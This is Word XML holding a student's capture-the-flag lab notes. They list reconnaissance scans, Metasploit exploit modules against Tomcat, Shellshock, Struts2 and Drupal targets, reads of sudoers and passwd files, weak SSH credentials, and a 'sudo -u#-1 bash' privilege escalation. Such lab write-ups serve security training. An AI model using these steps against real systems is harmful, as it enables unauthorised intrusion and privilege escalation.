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0BBB" w14:textId="58AC2595" w:rsidR="00C24DFE" w:rsidRDefault="00911EBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONTAINER 1 IP: 192.168.13.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2AA70F" w14:textId="0FF37884" w:rsidR="00911EBD" w:rsidRDefault="00911EBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONTAINER 2 IP : 192.168.13.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6322F1" w14:textId="5FFD0086" w:rsidR="00911EBD" w:rsidRDefault="00911EBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONTAINER 3 IP:  192.168.13.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A38D0F" w14:textId="4F6C3EDD" w:rsidR="00911EBD" w:rsidRDefault="00911EBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONTAINER 4 IP: 192.168.13.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B47CDB" w14:textId="298EFEBB" w:rsidR="00911EBD" w:rsidRDefault="00911EBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONTAINER 5 IP: 192.168.13.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF1AAE" w14:textId="3D3F81BE" w:rsidR="00457311" w:rsidRDefault="00457311">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48612BAB" w14:textId="5E8891CB" w:rsidR="00457311" w:rsidRDefault="00457311">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctf3-azurewebservices.net: timp98 timothy1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384DF941" w14:textId="22600AA8" w:rsidR="00457311" w:rsidRDefault="00457311">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598592EA" w14:textId="34AC968C" w:rsidR="00457311" w:rsidRDefault="002C5AAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C184A4E" w14:textId="0AA67EE0" w:rsidR="002C5AAD" w:rsidRDefault="00000000" w:rsidP="002C5AA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2C5AAD" w:rsidRPr="001845C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>HTTPS://OSINTFRAMEWORK.COM/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C5AAD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F69759" w14:textId="245AC209" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5A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DOMAIN NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D29761" w14:textId="73866A89" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5A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WHOIS RECORDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1F884" w14:textId="6A91F1FF" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5A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WHO.IS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFDB227" w14:textId="3C315022" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5AA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TOTALREKALL.XYZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADBF7ED" w14:textId="601B0024" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5AA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FLAG 1: h8s692hskasd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E15639" w14:textId="355FEEC5" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5AAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C57C958" w14:textId="7AB40CBF" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5AAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6859F2D2" w14:textId="205CE8AD" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5A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TERMINAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756FC68" w14:textId="29D04473" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5A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CURL -V </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="001845C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>HTTP://TOTALREKALL.XYZ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B6D9161" w14:textId="143829C6" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5A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IP ADDRESS: 34.102.136.180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7581C" w14:textId="2FFAE6D7" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="002C5A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2: 34.102.136.180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA467E" w14:textId="3FEF32DD" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5AAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567F263F" w14:textId="11DF996F" w:rsidR="002C5AAD" w:rsidRDefault="002C5AAD" w:rsidP="002C5AAD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0DEC99" w14:textId="27CFAA86" w:rsidR="002C5AAD" w:rsidRDefault="00F235A4" w:rsidP="002C5A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SSL RESEARCH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD9E3C" w14:textId="56BEBC0D" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235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UI.CTSEARCH.ENTRUST.COM/UI/CTSEARCHUI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41339C" w14:textId="7DF9BEA2" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235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INCLUDE EXPIRED AND SUBDOMAINS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711336F3" w14:textId="3E10E2D1" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235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3: s7euwehd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DA494A" w14:textId="097C1F77" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CFD598" w14:textId="35421F5B" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9B8B4" w14:textId="7B9DBDCD" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8768DE" w14:textId="035CD339" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235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TERMINAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1FEE67" w14:textId="3B9E201F" w:rsidR="00F235A4" w:rsidRDefault="00F235A4" w:rsidP="00F235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NMAP -SV 192.168.13.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D85F69" w14:textId="59F3B9C8" w:rsidR="000E1BD2" w:rsidRDefault="00F235A4" w:rsidP="000E1B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FLAG 4: </w:t>
      </w:r>
      <w:r w:rsidR="000E1BD2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C232CB2" w14:textId="35BB41AF" w:rsidR="000E1BD2" w:rsidRDefault="000E1BD2" w:rsidP="000E1BD2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FLAG 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3AB17" w14:textId="79E99879" w:rsidR="000E1BD2" w:rsidRDefault="003174B9" w:rsidP="000E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ZENMAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B61CE" w14:textId="1AE3D5C9" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174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NMAP -T4 -A -v 192.168.13.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D3B37" w14:textId="0BE9E583" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174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192.168.13.13 = DRUPAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2716973A" w14:textId="6041D227" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174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5: 192.168.13.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827FEDA" w14:textId="10C1F989" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8EAB26" w14:textId="0CE03A1B" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121D509" w14:textId="09174FD5" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="00317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NESSUS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E65C9" w14:textId="478041CD" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174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ROOT PASS ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E692DBE" w14:textId="3E19D2D3" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174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 192.168.13.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB9C5A3" w14:textId="5EEA7260" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174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VULNERABILITY IP FORWARDING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1568B" w14:textId="7B3388C7" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174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6: ID 50686</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031346CA" w14:textId="466B7922" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2412F8BA" w14:textId="06DCB637" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4709C3" w14:textId="3ADEFC5F" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="003174B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784A4AD" w14:textId="0C130144" w:rsidR="003174B9" w:rsidRDefault="003174B9" w:rsidP="00317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ZENMAP SCAN 192.168.13.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2611EB92" w14:textId="0385DAA0" w:rsidR="003174B9" w:rsidRDefault="00BE5184" w:rsidP="00BE5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METASPLOIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120DC61" w14:textId="0A3B4356" w:rsidR="00BE5184" w:rsidRDefault="00BE5184" w:rsidP="00BE5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</w:t>
      </w:r>
      <w:r w:rsidR="000F6CBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TOMCAT JSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E1CC6B" w14:textId="70D82DBD" w:rsidR="00BE5184" w:rsidRDefault="000F6CBE" w:rsidP="00BE5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EXPLOIT/MULTI/HTTP/TOMCAT_JSP_UPLOAD_BYPASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305FA006" w14:textId="42CF5228" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6C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RHOSTS 192.168.13.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268FA2E6" w14:textId="77B1FAD6" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0DF4E" w14:textId="6EA428B4" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6C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FIND / *FLAG* | GREP FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA72FC" w14:textId="35E09104" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6CB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/ROOT/.FLAG7.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC734F" w14:textId="4DD05C97" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6CB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CAT /ROOT/.FLAG7.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7CF41B" w14:textId="44BB3B9A" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6CB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FLAG 7: 8ks6sbhss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA6972" w14:textId="643941FA" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A4F8E7" w14:textId="6AED6AAA" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3121F72A" w14:textId="282A89D0" w:rsidR="000F6CBE" w:rsidRDefault="000F6CBE" w:rsidP="000F6CBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F5B37A" w14:textId="7B7C7E96" w:rsidR="000F6CBE" w:rsidRDefault="003F509F" w:rsidP="000F6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SHELLSHOCK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7211353A" w14:textId="1F6CBCB8" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F50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MULTI/HTTP EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990AC8C" w14:textId="225088BB" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F50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RHOSTS 192.168.13.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069A23D0" w14:textId="02DEAEF0" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F50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TARGETURI /CGI-BIN/SHOCKME.CGI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9D62D" w14:textId="18150940" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F50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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A10902C" w14:textId="5DB287C3" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509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PWD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F2DB7" w14:textId="25E62512" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509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CD /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928EF4C" w14:textId="00D61062" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509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2F3F1F86" w14:textId="5A6B8A60" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509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CD /ETC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA8715E" w14:textId="370A47A4" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509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CAT SUDOERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B1EA5" w14:textId="024DB62C" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509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FLAG8 : 9dnx5shdf5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A526543" w14:textId="72D649C4" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D8E994" w14:textId="495C19E1" w:rsidR="003F509F" w:rsidRDefault="003F509F" w:rsidP="003F509F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D59B842" w14:textId="7569E9A4" w:rsidR="003F509F" w:rsidRDefault="005D5634" w:rsidP="003F5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CONTINUING FROM FLAG 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B351DBA" w14:textId="16B6F337" w:rsidR="005D5634" w:rsidRDefault="005D5634" w:rsidP="005D56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 PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D3683" w14:textId="1F1BD2FC" w:rsidR="005D5634" w:rsidRDefault="005D5634" w:rsidP="005D563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9: wudks8f7sd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979D495" w14:textId="11D1AA26" w:rsidR="005D5634" w:rsidRDefault="005D5634" w:rsidP="005D5634">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337929D4" w14:textId="4A46826E" w:rsidR="005D5634" w:rsidRDefault="005D5634" w:rsidP="005D5634">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E069CB1" w14:textId="30F0A58C" w:rsidR="005D5634" w:rsidRDefault="005D5634" w:rsidP="005D5634">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BAA21" w14:textId="773152C5" w:rsidR="005D5634" w:rsidRDefault="00E44B9A" w:rsidP="005D5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STRUTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A413BD7" w14:textId="135CA99A" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B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EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E34179" w14:textId="2B30CAC2" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B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RHOSTS 192.168.13.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF4733" w14:textId="1D15E9C6" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB61DE1" w14:textId="7025D32D" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B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SESSIONS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76234733" w14:textId="6EF74300" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B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SESSIONS -I 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2533C" w14:textId="678EB4D7" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B9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CD /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BC8A06" w14:textId="205A8FAC" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B9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4D466E29" w14:textId="2B2BAB40" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B9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CD ~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45558EBE" w14:textId="2502607A" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B9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673BEDB4" w14:textId="2591BAC4" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B9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CAT FLAGISINTHISFILE.7Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B6B0F7" w14:textId="5C66D73D" w:rsidR="00E44B9A" w:rsidRDefault="00E44B9A" w:rsidP="00E44B9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FLAG 10: wjasdufsdkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705C394A" w14:textId="34B1D330" w:rsidR="00062FFE" w:rsidRDefault="00062FFE" w:rsidP="00062FFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FF9F2C" w14:textId="7D8A2071" w:rsidR="00062FFE" w:rsidRDefault="00062FFE" w:rsidP="00062FFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370B7780" w14:textId="46EA784E" w:rsidR="00062FFE" w:rsidRDefault="00062FFE" w:rsidP="00062FFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 11:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C162181" w14:textId="1CDEB09D" w:rsidR="00062FFE" w:rsidRDefault="00543BB1" w:rsidP="00244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DRUPAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A4629" w14:textId="00B550FD" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543B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EXPLOIT/UNIX/WEBAPP/DRUPAL_RESTWS_UNSERIALIZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F0A332" w14:textId="5308F44A" w:rsidR="00543BB1" w:rsidRDefault="00152004" w:rsidP="00543B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RHOSTS 192.168.13.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1990A476" w14:textId="6AC2B0D7" w:rsidR="00152004" w:rsidRDefault="00152004" w:rsidP="00543B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LHOST 172.28.231.205</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A071FFE" w14:textId="11AB27AB" w:rsidR="00152004" w:rsidRDefault="00152004" w:rsidP="00543B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 /ETC/HOSTNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D7CA5" w14:textId="6DE10101" w:rsidR="00152004" w:rsidRDefault="00152004" w:rsidP="001520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11: b2a19043bffc</w:t>
      </w:r>
      <w:r w:rsidR="002757F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF06C8F" w14:textId="6E2F418E" w:rsidR="002757F9" w:rsidRDefault="002757F9" w:rsidP="002757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GETUID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2CF23" w14:textId="3ABC96C8" w:rsidR="002757F9" w:rsidRPr="00244C59" w:rsidRDefault="002757F9" w:rsidP="002757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11: WWW-DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7C810" w14:textId="6622F4C3" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47CF6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6614CCDB" w14:textId="6969E4C3" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47CF6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 12:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E79FAC3" w14:textId="11DF1B31" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47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FLAG 1 – SSHUSER ALICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722D93A" w14:textId="2B3092CD" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47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SSH </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001845C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ALICE@192.168.13.14</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6A124" w14:textId="5A3A1B9E" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47C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PASS: ALICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02426BAC" w14:textId="6E328F25" w:rsidR="00F47CF6" w:rsidRDefault="00F47CF6" w:rsidP="00F47C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SUDO </w:t>
      </w:r>
      <w:r w:rsidR="00BE4359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-u#-1 bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA6D56" w14:textId="6B18F298" w:rsidR="00BE4359" w:rsidRDefault="00BE4359" w:rsidP="00F47C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EC4612">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC4612">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF9AA01" w14:textId="55BAF755" w:rsidR="00BE4359" w:rsidRDefault="00BE4359" w:rsidP="00F47C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  <w:r w:rsidR="00EC4612">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E489C" w14:textId="2E34E194" w:rsidR="00BE4359" w:rsidRDefault="00EC4612" w:rsidP="00F47C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</w:t>
      </w:r>
      <w:r w:rsidR="00BE4359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag12.txt</w:t>
      </w:r>
    </w:p>
